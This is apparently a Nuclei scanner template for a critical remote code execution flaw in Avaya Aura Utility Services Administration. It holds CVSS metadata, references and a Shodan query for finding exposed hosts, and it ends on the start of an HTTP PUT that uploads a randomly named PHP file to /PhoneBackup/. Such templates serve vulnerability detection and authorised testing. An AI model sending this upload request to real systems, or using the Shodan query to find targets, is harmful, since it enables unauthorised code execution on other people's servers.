id: avaya-aura-rce info: name: Avaya Aura Utility Services Administration - Remote Code Execution author: DhiyaneshDk severity: critical description: | Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/ - https://download.avaya.com/css/public/documents/101076366 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-94 metadata: max-request: 2 verified: true shodan-query: html:"Avaya Aura" tags: rce,avaya,aura,iot http: - raw: - | PUT /PhoneBackup/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} User-Agent: AVAYA Connection: close